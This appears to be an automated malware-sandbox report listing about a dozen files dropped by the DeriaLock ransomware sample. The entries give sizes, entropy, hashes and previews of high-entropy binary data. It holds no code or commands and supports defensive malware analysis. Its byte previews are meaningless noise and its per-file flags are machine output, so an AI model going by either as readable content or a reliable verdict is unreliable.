                                                                                                                                                    Preview:.W..~....C........t;.H@.F....N......l.+b.(.B<...w..".tr.....q.x..k...Q..U..q...d..H.....z.q.s}u.)..e"..... ..'.?8t..5f..W.....)#..#D..Q....d..m.M....x..2.5-\............X...Dd3....l.C.......f.w.vY...,.h...kM...g....[=.JI.-.5..x...)2..>.!.m.$.e.l.c....HD..h.P....w.KMG@.......i......>8I.Z.-.i.<Q.Y..%...G. )6..=;.mG2;W...[.K;W.7.[..~.T...[....s..2..........P..&2}...n.....I.}.v..f>....s......lj...Bd^=..dW2\."D].U...."2mH.J.4....5..........p.Q...m..N*OiP.K..[...\....?2.....>D0..G..,..Kr.it..rT....w}4..]...C7p[.`.u..$X.Q..?.j1.HX..7>.`.]..g0...!.i..y.e.3...fe..c.R.`......X..B..C.Y.{.......6k..........s.".2Ny5..>...?..V...}GWn....}ym....<..|...U1z.n._.z*.Pr*.f.5Z...Ry.-.z......Z.n.*6Y0"0...G.e..O.4.u ......)|........XU..d.....o{O.F.|r)VeD.....O.%.>#&.ri$.7svA.Y.......d.i62!$|............J0......'......z..D0..|wY.......M.R..cb.U..WK..&....BddJO.........aY.2.z...m)\k.....Z$..h.s.1_;..1..M]...?..j]..9v..M~H..C.yJ.lT.g.^....?.H...6-...n..Y...+.X.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.855041787250714
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:T9cO5TNFaQbS5DaCXTRWQACRIUcNcwB7JegKnON36EOaTa6/RxpX:T+UTvaQbS5/FHIHJ7JegKnkKEOatpP
                                                                                                                                                    MD5:00E209D5248EB62F82D727DB2AE0C011
                                                                                                                                                    SHA1:AE0B5AFB62F2873BC3E8A72461AE23121F422DC1
                                                                                                                                                    SHA-256:E496659238C660C31D502E7D7C078BA6EADACADC17159702176D468C62400E2B
                                                                                                                                                    SHA-512:EA7E4DAE53B306CF89F990519B16D7BD6740DB7D0996546C545B42A4641338D9293B32186404B0C4506DFF30E9FFE927D67E74ACB9FA268175F8C56DA9C54A63
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:..'x...pl.93G...L..!`..xd.0.o......)a.~f...x...\..y.&.....L/..x..2W....t...?fC.,...].}.!...v.~...).........g.d].$ ....S...@.Rh..g9..p...,......P.F...A.....:F\...g!.P..Q@.6...S..D.........R.O..OVcr.7....K...}..nep..M.C.....8....P.....S.l.u\1.....MCL7-.p.."I .E..)f......v!......%5E2y........E.\....}.Y......}.aJ..;...o...w'...W...s_C.n.;...S........!..NO.$..r*..._1...`.a..d...SsFT.U...p.......4.g\.oj.O}cA.+.T`r.._..6..:".y.....V...hu.q..m.\,C..i.a../d..$"..tM.vb.2s........-.@w..sl.'.....k'..B$~...!....../X.u...^......:......i.g..Y...m/.-..f.....d9......c'_.v.[...}...5A.p...z.."........3...A."m.M@W$.....D8.B..Y6>...VW$...8.{..(x5..y.........A....h....|.C-.){L....r../A......B^.C..x-@........k9.q.n;uz.9.&.?O..K.;.R.#Q.....k....V3s..n..........[.R1W.....|J....r.I.....r@...Y. Q.<=..I.u.'...[&G.q(J..,...k....$..3.}J.....q..#/.h.)...a..o5z....}.."..80.......j....kn.O.-...c....r.X...."...@#..J.....e&.+...1<..(.1s...g.......L_P.....#...ZM.4Z\W.-..
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.794130872631665
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:I5VgCfnvjAHIlUTNcSoJU5FeMkvnmhcdPoUlmdpF2CdYZ9xivEpa:EyCfkH+W+fysMkvVPoUlM2aYMz
                                                                                                                                                    MD5:FC8DE7085983E984ACF4B6E1173B83A3
                                                                                                                                                    SHA1:5F06F337296B01C189D32DB83D4E4E8BBB6132CB
                                                                                                                                                    SHA-256:CA5666E4833293D13C464E63A7822EBCAC126ABDF56D2699087D3197847CD12C
                                                                                                                                                    SHA-512:5BA2E45DC20364C1A4256AC2ACDC0051EACD9BA40F57858F7AABA89CB1177DBAFE5A7A379FA0A87C00205A93F70B64F43F7D8C18536507CDAF924CE4F19941AD
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:..+......q}.*..i.A\ ....i...^`..>.)O..rm.)`W.+....Q.gN=.j.....5...6l.8U......R.....T.....)6"....@.E.>K!I....8PN.".[.....Y......*.a..g..-..\.n7#..<Eg(-.Ws.J...6~Q.t.x.k..k*...y..BC<.DJ...]..4..5...*.T..k@}9.c...d........=B...xS.`...G.......E.NpkL.]xc...'...Q(..&..l/.Robf.I.E....:7..,..0j+_|.....1..\,a...b&.9|.{..c....*j.~u.......h.2zm...5(..)...]..M......b.?.\.2..I...H....`)....4#......`..5.: ........i.b.K(../..tB|....!.>...Y.\f.Q.Q."..y.v..\..zL.5..... %Y*...."~.._..S......:.3.sz...Gz.z.6..gT.V.k.|.;|h...7..o.*T....F...R.OG..g,..m......j..;..?.P..H9.6..&...(O.-J...C.~........ .D.....vt.D...$.m....lI<%.3o....1........?..._..'k[2./.r...q.N......9.B.7p.?..i.....L.}..3l...@..... c.-VU.V.H)n..B....6.-.&Q.;....+...:.......6.....O.[.j.^............d.[.l:.....1Ia\o..6M...g5.>p<o..~=...y.m.....-4IW[.GH.u.E..v'.".[....0...G.....*..xX..Z.......L..m..0......?..'.c.iu.................F............BET.&a.-<j.'..">..)....7!yH.$...1.....r...eG"#.<-...0.8#h
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.82687539218185
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:pCjcJDEbVM36ByaW7TUDOzahTmyGToOMOg+eQFcHK:IjcJyM36BdsTU4ahTscOgQ+HK
                                                                                                                                                    MD5:DF957D82A0FBFAC6EE068AF357ED4750
                                                                                                                                                    SHA1:F351AA79A59AB51BD0FAE4169FBB05D6D92874EC
                                                                                                                                                    SHA-256:BBD2FC1B0AA0D242E3C1D59121EA1206517C84C62A5D3D38F8066E58506E3951
                                                                                                                                                    SHA-512:6FDBE22C0BEB6D5B60F51D83FB5C13018621078D496231009AB688263A2406F67A34E198292766B55552CAF6F5615EB446C36BDA86529C428BE6288FD390F4F7
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:n..I...>!....#?y.....>..FP...L..W...Y...P.0..w)nt.w.I..<fY..)l.6-.B.Q.......t.(.s..;z.......q....2..k8.Q.#...._.w."h....=.HF.ho..s.``..........#..n....y...w_~.R.._n..s.w.9....<....m}..w........6..g{pu.a....D.Wq.*..RsA..\...J..j:......D.s.S.......Z.%...x.5.U`Urr../... ...ls.!.......`..<%......-V..'..R......X................f.)..=..8..5....FZ.~...Jc..-.:.Q.U ../.......S.J..5..D}$..P...YY..F..]j..'.e.4..z.5E.:....q..............nt..c...=.>Y.&.}.GQl..&.T........*.."..........kP. .t.j.+..{D.......\W........[.o.".wrt..a.j%...X....Pe.I.5.....8.....A.j..M.VD.s/.-pG#:!U..mA(0a.......i+.E.u...G.q.......;.L.mf.R.y?W....;?.m...f.?...h.h..e.............s.Gg.hlS...9.N...h.&..!. .X..V..~.S....I.`...Un".b.~h....F?9...'.5x0.5.sUY..0.5&.dj.O..;m!.X..E..jw.!.A8.Mq..,=./E......:....B......R..I.R.T..n...I..{..h...}1A........8.zf..up0<..}w$.G..l.%.M1...B....S<H.D.......s.M......@Y....2..6..!..8.5 .q.Nc?..g..1...9.W.3<.w....... l...^D7.p..`u...Ul .g'4(...9Z.5.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.834693019177352
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:REOrsN8+7mO66KTq1WtyqX3YD1ijUmSrUU06E1A+KMn+6YY1J62FRXijimr8ZC5m:eYJkHKTY4nYEjKrVK1p62Hij8E5m
                                                                                                                                                    MD5:440963EC0462D7D1F2F67E4C62D66E4D
                                                                                                                                                    SHA1:951A5497BB2C93E5E73A4392F524F3B307BA6904
                                                                                                                                                    SHA-256:C8DA1A04EA404A7F16F787517F7EC0A8CC6E7B8E3098414EF7ED230559A6113C
                                                                                                                                                    SHA-512:4902BD99BBD6A97AA087CFD7C7A2568E25627764E32578D9ED0E7618B92EBF6CFABE32D3CC447C3C0512E70522EA76FBB4D0268C11E0CEDB6A91F506227A8ABE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:c...E...\.O.....kc.)...%YQ."q.$..a3..B~R...9~`...5..W.uC......o..VdV........0h9.X...].."......h..#3V..'.....H..&ls'.....L'..^....K7.im..H%:.z._,.#.HM.........| }.9.K.c.]w.f...N.../.M*..j..,.c..3..6/......gM..O....XD.+.nf}N^.j...e.R.!../f..g...V...;.R,.#.......R.,.JM...=.Ai..A1...I...........J...<.p..y6..r......<......)wC.....9s.-J.`.5.hA.."...}..h.3...(..)......4{..<...q.67.r...a..1..&..h.....l.n=.JI..y...~.<.f.aI.~..Zc.#.......~..3..F...F.`..6..1.q......B-.p(..8.g&.c+.....DB*X!p...9.....`.x*.'....-.@..vM....................Y...@f..|.3H..aS.".^......%Z..q.....S..s.p.@.~..|..H.;|$O..Q....Z.^q..^q.p`...J..x..E\T.4T.2.}s.}.[...+...E..i....|........4.2.....Z.Uz.l.....sp.4..R0-Rg...*.cQc4.{...1......g..$..O;+x|Cw"*.0'...L........z..z.Mco.z.GS...m.?.66......i.. .^.-.?.=@f3..`....&.Dw......0.<............^...W.X..Y..VPn*/Y..../.+...A..X...E...2...&...R.;.}.h.e../:..D.lW6.q.J..QhJ..{...y.b....sO.I.@Bg.>Z.....d./k.QP..n..._...<R..k..."%....a..
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1040
                                                                                                                                                    Entropy (8bit):7.794158976719008
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:hgofjp/a2LobZcB3pXVLRExccJhjPMBifscR6O7n32i:hX1UbOpBRzWPgifscR6ID
                                                                                                                                                    MD5:CB13AC7C6F3B4F60571343B5EF149BC6
                                                                                                                                                    SHA1:8472390DCA07DBBE4816E6D1E47540361EFC99B5
                                                                                                                                                    SHA-256:792A23BC6EF58F08E2A216A03216F915EBC68895607BEBDD14CA9764023125CF
                                                                                                                                                    SHA-512:B75B36561312DABF6854FB72B22A7CEE945634491D91D220F358BD29DACEC81F0F4128DF5E0BB15E7DDACA26135386A6D59F35A351DCFF623BEC2890EB306AC5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.&.}.d...e...q....L..f....vE.......?...a3...w..Bn../iN.W#.U........c...I.q-~.'q......?........?~P.H...........D.?...M.:...\.a...~.....k.>4.L.'..i.....O.!4B/..L.>7n'..1V...48.<...7'.J.B..6....3.|C@.l....W.]....71.&=.u......}..._.7.........DxaF..Q...1.{.K}j.>..g%.@fi..0......^Y.'C.".C......4P._..rSF....\.j1i.]..+...h'....O.J....B.....#Q.,G..u!x..b.X. .....`.,....q..2<.`.....".>..16.....N...7)..S.....Xyh....r.[......$... <.....Y......H..?...W..R.....l.F.N.0r..B."6..{.._*..y..4lH....qK...E..a........p..h.V...k2{|.d>.."..:...H..*Z...(.P.mpp..1i....6.a..;...}..kd4..\50.rS..K.A..p6...R.....eW.L.ah...Q%.....3.U(<O...e.*Rz.........._....}.z..{..c...%...0..sk.#..c..Q.F.E..G;.u.5..]%e...&....Z.......yB.*.8.]B.\X.Oo.c1G.Pj/...|VV.4u_..k....9...5&.c.^c....U....:...S49.8.N.......L.6.c.f.@Xa......4P..Ep...?sz........U.......p.\.....[*.N....Y....El7I?.>7.V..e_"'.f..`.o.....?.Q.+."6. ;.D..B..1..V..o\'.dnR.Z.6.A.@.......:TZ..V..1..[.W..-YH.)N..@e.>.bK.}..
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.813426569745349
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:DRuQUz9WxiyyLWmc891DDZTfa8Yg2AqVN9puh5I2giKQJ9n:49WxiyAWu15a8Yg2AqVNXubIbiKQX
                                                                                                                                                    MD5:18CE578D1CCD4B24660E487FE75019E1
                                                                                                                                                    SHA1:FCDB3DBD7CB7DBFBB5C737A39F1A06111594FCDB
                                                                                                                                                    SHA-256:87C7A3CE0FDABA06B35C0ACF5A860B8B9DBB080317FFA0777B63DBF0CDBD2C49
                                                                                                                                                    SHA-512:97375DA7FBBF50D0881D7990FE20075CE06E0DA128098D0A26A4ADF68BEB494BED1B02EC7ECBD0A56B984814D05A82996C28DB8B18E533A52F5F0F18A0DC8457
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:...U.F.......W/P:!M[..P\.r.5."...~.-.yDoG^,W......RO...zU.....AAL.=QE......wb..*..9.s.$..&*f".8....JB..}........b.m...{.y@....0....;.|.0........Y.......H.;T.....BaN..Uz.S..9Zg3.(T..b......;?.6...&N...3A-.N.....r..K|....nM..i.Q.~....-.).....>.J....Gu.,.8C".....T4....$vs..........Z$..t$......$.<V..C...f~....q.v.X...".....(.O.B.....B.H'.....CQ.S...~.0..w._...H..l.tt..........._u.....p.fE...J.d?u......FqS.16..$...X.nF,..........(..Cb.....=7..W.-.Sf....V.(9U..9... C.....Y.#.K.d!.z.......C.MN....7.S.~w%/..[.^........S95k.{E.l.0..y....=..tC....DO.N...Y....m..#....<.}..3...+<..x..{.P'.v^.)...........B.g...L./..0< <..eX?eh....b.-..K.<@..s+.).n.......].(z.}....^P.s....(...2@..H>..9.c...+.x......J.3pj....(.."__.B.|V.E....dM.Q..;..ZN0..[q.|.yS..D..(^MP../.~..i:.Qb.5y6......gb..6.2M..1...'....'...":....f....g...O{..v.t...Vk..J.}y.@..Ca.<.1.M.S..Wt.z.(..a..:..!.i...J|V....<......DE..+.....v...J...Jq.^.....t[\@.p.F.o...:a.@7.+...`.y......B.c
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.821543423942398
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:WcFsjJP6RPyK6mLf1TKnipDOaBgWSrVdfpw9d7JpLn:WcMiRPyK6mbZKipDOayTrVxpw9dDLn
                                                                                                                                                    MD5:34902B0E16E9C0AD85FCD394294DE0D0
                                                                                                                                                    SHA1:B3767135027E7874ECD61C8145CDFFB3A053B583
                                                                                                                                                    SHA-256:00EB616A3C1643DD5CCA7C137E15D212F31581056BF10CD46A5E85E9B2E2D3BF
                                                                                                                                                    SHA-512:B63714F43A59D8DBFABEC2B2F2A1678E947D0CAFCCB9389F72866515892A745FF200B78367FEFD8D9BFA64D064700665A94905361CA38D19BC714622C157C4FD
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:..r...-....Nn}...x.........t... ....z..=U.I.T.V.m.2..6%.\.....@m..*.Y...~..'...].."t&e....g..F.H.p"....{5.n...B..2..1g...<0.....g.s...I.....[..G|..t;.? #Y.E.<o...o.I.zb..+#..Mkk..m.Q....q.[.O....#...._.\.@!^d#..4....H.+.._..i.=..1...../.....NU1]...&..N..S@...>.}..JEn....zA.....u..L..44.//..ZP..........l,..E..U.J.).WW__l.j.....p]q...!..^...`...A78D..Y.e...te..}..H.....1.....nYh-.......NX.c..d....K.Y.3.Lv...`..05....e.!...f.Ov..f...6.Q.`.}...O.(..9.e.Y+.}..x&..;.......".T..")...........y.........&.Y+..UjI.t.U4$=.....jB2K..#..y....._. Y.....:..+.C..^92>.v..=.*...g.:.;........p..r<....]@XHQ<....&....|".%..V..)..]Xc...W.8...+.9:..~...^.I.j"2d2.'.OT...E.\..(.ln....?......4N.>..N..}0h..Y...r.;5..t.s4.....]../Z..*9-.:.x..*....~6s.....`HD4W>s.].+B..d.kvt........+.O..s.P.....N...hX.. &`..k..U..6..Z.R../..k3f..U.Y...+H..f..-N..w.Z.T.u.).5LV..ZqG.5U.H.o.....j..'d_A.79..?.....w..$.$.<.u.xR .6`..J.R..t.P.)DIm..c...>;...,...C%.?.,..t...B.]..y......A'..
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.849831689237574
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:2v/tRwcDkltpRpB1asAnEognHsvc/P+xd3OQ:Wd+RD1InEoIsvcmRP
                                                                                                                                                    MD5:1EB57D9F110230B7098D33E4FB1894AC
                                                                                                                                                    SHA1:CF8D330F490565B4E2CA26A2A00B6A6C8554B61A
                                                                                                                                                    SHA-256:12A0FC97EB4C6638C9D49D0BE4611E8BB8E81D26EEB89165FDED30141F1318F3
                                                                                                                                                    SHA-512:285B3AD4334B5C67FE49FC78274205AB2D66918FED222FD848BEB497E0904FAA325E8A1A154BC2A2946F23C4C2BEECC5AA19B3B5CD547FC9D79548811AEDAB00
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:..,\....=|g.wR.A).E..H.[i....4dq.$v ...9-..=h.p.J..-M.Y...<.p...)e......">.}.4...~.,:..Zp.6OF.vB.[..]X.n...q..P._.)0s.)...9KNkA.Q....'...t0..vA.zdV.... *i8.....B4...r;B.....?.}...P.....<D....t.C...$;..N?.1..#..R.......;.VO..5!..a'.....J.v....k.9q.QJ...#...?s.$..Yn.(>.q..5.z.4...\..dL....P............ .1.g.`.....b..,.%[..oL_z..-.3..>.Z.g...j.BgIe......G..w...V.......[ ".....}..Qw..f.7@...:...5.8..7..?..).a.04....OK;...sC..:..%_.j+.,r......=QO\.h7a.3.l!..!..[5,Z..^....1o...MN:.Y...a..Rd...B|.M...F.b............./-.._...<....y.+w.{.G"...|..Wj...Q...3..*...`...Q.6Q.Y....y5...N.b.|.{..0..3.d0........zk.......6............P).s......-....}X6v.t.".IM..{....E.*....~.P... ......(.@..j.D.<.c.6...8..K*,...0!.L....9%.Vev%.+... ..E.D....K.tyb?.mU.+...R-...~..ID.R";G..I.4.......#P.......Y.=2......C.+...N.%!C{]..Dc>iU........~......U.....q@. .{.KXv._..9...f.4.aTLo>..5...PBB%:.V..v.4....d..bgx.ez..8.gpz.."..>....?k.Ft.4..hW...{...f.8._...._..+.1.q..(T
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):416
                                                                                                                                                    Entropy (8bit):7.507484107545686
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6:y7BRaUG0xaCgour7OKpEBdTRAsimV+6NJ+CtWaWk3U8YZScPOHNkx+n2xVncGg1X:AuiMrMhhtXJxWaWk3UNZSWkfgVn7cdJ
                                                                                                                                                    MD5:56544FF9A9A659E62E4FBACD214606F5
                                                                                                                                                    SHA1:CB2ED2140679A640E1AF0C81732A83CEB78F9BE7
                                                                                                                                                    SHA-256:4E80BF07432C5E6C9D9FF2112B6DD8D5705C4261B724F930F6D39A0692875D4D
                                                                                                                                                    SHA-512:F58960722EE499FE8CE5E6D67D12B21E79D63C632C08A83B742836DA9E832EA5D81DFC5BA06A4489E29B5AA83F57C1DF14699AEAF92DF74E6FE57C25E1C03B67
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL....v.f..Z.V.....$......,...9.@."a.d...M^.'.5.n_.*......0....$;.^. ..1..g._h...T.'...2..."..FA.B >*.....G......<m|.Zx.q.ya...D...J...J$......uD.....9.....kq.).....#...v4.8.I.w.........n.^....v..Je........).u.kz.0.q.....>...K.7.}n.i..SKt....E....;9.Hir..N.,o.qZ.u..E.?l
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.827282413214549
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:PyHNm1cqzxwU6g2RtOcr2xCHA2u3LopjdgGkqUiAsr+6g:PytX0xdiSbdXc+3
                                                                                                                                                    MD5:4C869D01AB277A3FBAA5F0D3A66E1FF7
                                                                                                                                                    SHA1:7D0F1F23E7F43CC4489B52EE52D13A42F5A9680C
                                                                                                                                                    SHA-256:992D3C9FECB96306B0C788D5CFCDF166ABF09F3A8EA38E262FF505A2C490C00C
                                                                                                                                                    SHA-512:6E8E5F17771F7174EE5AC72735A25EFD15D1E2F767328A83710E728C44A45B7B1C0FD5D6B345EB04DB9D6D60178CB8320908265A2E24DA769EE6E28FAEE9655C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:'..6l..7.......i6G0.d;h.#f....Y.......9...Z...43.Z4.n....q...."...'..[?\DR.....6.6...Z...}...fjh.....E...W..#..^.U8Z..N....6AG3f.f]|A.(.il....acGX90..t.}.B.....u..H.[.Hb..C0..$@...Y...N..C*.7c...{U..;y..%.H.~.u.+.H...|.m..wcS._*B#......<R^.....U...gruc...j.!.8... ..m.F..].;r.m......&"..X.0;/:..V.-..Oe.VZ.W..`.n...q).F3....TXV.AT...sO:j....h%."C...&.55.vL.s.cd..pV...Y+V.a. ..d.Q.NJC;.t..y.C,."v.7...._..]e......u..sm....!..S/.....y..Y...%.V......s7....=K....J .s.....M..-M.S.....%..v..]..0(.4}../).g....._.J.8!h..h./..7'yS...&T..[.9...:.I...j#B..W..(...C.C....i..S1y..5.>>rM........W....Fo..6L...NG....,..h....>3.......s*.*c..Dp.9.G.c.).o.O.>.:..M...!.aU..V].(.....:..Q.\....%B.A.QTE...w...... Oy.q.....E...@O.{.ck...\$.G.J... ....5.2.\..A..8."wX.-.0.%8xR.(.........8.(.N....GK.........7_..*./R>$P......XT../Yue.}.G?....D|.U%../.......J.W..N.........w!..3;>.xXt.Q:.....\k....Mh..@x.?3M<x..o..).Y.J...z..=..{.(fC.%...}..#.^.Y.o.x...]y...li.T.?+u...2.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.827282413214549
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:PyHNm1cqzxwU6g2RtOcr2xCHA2u3LopjdgGkqUiAsr+6g:PytX0xdiSbdXc+3
                                                                                                                                                    MD5:4C869D01AB277A3FBAA5F0D3A66E1FF7
                                                                                                                                                    SHA1:7D0F1F23E7F43CC4489B52EE52D13A42F5A9680C
                                                                                                                                                    SHA-256:992D3C9FECB96306B0C788D5CFCDF166ABF09F3A8EA38E262FF505A2C490C00C
                                                                                                                                                    SHA-512:6E8E5F17771F7174EE5AC72735A25EFD15D1E2F767328A83710E728C44A45B7B1C0FD5D6B345EB04DB9D6D60178CB8320908265A2E24DA769EE6E28FAEE9655C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:'..6l..7.......i6G0.d;h.#f....Y.......9...Z...43.Z4.n....q...."...'..[?\DR.....6.6...Z...}...fjh.....E...W..#..^.U8Z..N....6AG3f.f]|A.(.il....acGX90..t.}.B.....u..H.[.Hb..C0..$@...Y...N..C*.7c...{U..;y..%.H.~.u.+.H...|.m..wcS._*B#......<R^.....U...gruc...j.!.8... ..m.F..].;r.m......&"..X.0;/:..V.-..Oe.VZ.W..`.n...q).F3....TXV.AT...sO:j....h%."C...&.55.vL.s.cd..pV...Y+V.a. ..d.Q.NJC;.t..y.C,."v.7...._..]e......u..sm....!..S/.....y..Y...%.V......s7....=K....J .s.....M..-M.S.....%..v..]..0(.4}../).g....._.J.8!h..h./..7'yS...&T..[.9...:.I...j#B..W..(...C.C....i..S1y..5.>>rM........W....Fo..6L...NG....,..h....>3.......s*.*c..Dp.9.G.c.).o.O.>.:..M...!.aU..V].(.....:..Q.\....%B.A.QTE...w...... Oy.q.....E...@O.{.ck...\$.G.J... ....5.2.\..A..8."wX.-.0.%8xR.(.........8.(.N....GK.........7_..*./R>$P......XT../Yue.}.G?....D|.U%../.......J.W..N.........w!..3;>.xXt.Q:.....\k....Mh..@x.?3M<x..o..).Y.J...z..=..{.(fC.%...}..#.^.Y.o.x...]y...li.T.?+u...2.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.798458122203083
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:ZcUA/u4e7yAHNRK5IRiPW0pdEyXUyp5VTMgrC:ZHAfe9iPW0pzXUyxMoC
                                                                                                                                                    MD5:C8164BD1868D17D6516669E1EE34A885
                                                                                                                                                    SHA1:6C6456972E9E1E45B5AD111F8D24F9EA83717153
                                                                                                                                                    SHA-256:2783821B0C07767247C859DA08F907AFF7167B42EAC5E7FB2836618B46317E5C
                                                                                                                                                    SHA-512:0DEF2C6999D789BF7812603F873D7FC9F07350254594A58732180977C287A6FE75614DB9A9A92321F66AFF816E0AA641B4EF8C9F78E77670D4573A9CDA78521F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:HvQ/..0.|..<..2e..b.-....1<... .%.z_vL.I....Z/e....!.{/4D.|....M^...:.04..U...L...K..6.H..Su.......z."{o+).-.iN....nhG........g..HO.......f......!c+.m.wk.N......jl...@.o..........Qd:.XpD.$i.v.ceU/].$...cD...!.h>B.r....`m.......W.;$........l.E..=...ikm.SP..p.|Z.'...........Y...c..<.yL..;V....0.\..."....l..TS.q.4m..|..D...}.-..@...!a.^...(...K.:....A......$WAE:...A^...z. (........s}4.J{.A....."..(.(.......?n.......b.,..rK!V..TeU|b....y.J.;.....*.<0N...l...jY.9M.Y.6y..W.;.W...f.....6#I.T.`hf5.^..b...[p.S2j.bE...r?.. .P.=>.".Be.."O.HG|.....?...D.. ...b..W..3..;.N...UF...u.@.ddU7..qjf.A.>...............`....;...4.:...C#4...(R..7....^}....RJ..-.F.$.(..G....f.p..3..C...g.|..]".K....+..v.uP.dl..&.......*..Bq..e....D.T...Jl..&..\2v..).....d...]G.)....i.ar..rq.............K....L.2.?...J..h..N........%M.n.< ..#.EW.]......j.F./.....ue.r.[...].9.-..........O..?q.P.,........W.....ij....A.Q>!.....X....'..p....J.g...5}.+.......2G....."v..i..M|(_T
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.819814279728288
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:DIcgVE71EdwDNHutGVjYxB9bn2ACx2S9Euues8EFeOZEqd3/enLl:U9VqOdw5HyO0xB5n2yS9EzePIdHd2p
                                                                                                                                                    MD5:2A925C2B9390AB8ED60440CB47A41B53
                                                                                                                                                    SHA1:A3C7FD400990A90C90AFE7101A979153D9DA673F
                                                                                                                                                    SHA-256:DBFBCC241B40F5656691C26CB5917D6F096AC4CD3D3C31F816EC0D16358FCB96
                                                                                                                                                    SHA-512:C6E47007CFEA7BF2AF7DA60719C54AE277916F2E3937E75C2AA3C4255DCF42457186DC05F66526B471DF687AC97EEF02D0084575B87BB4B2BA41CE408614E8C4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
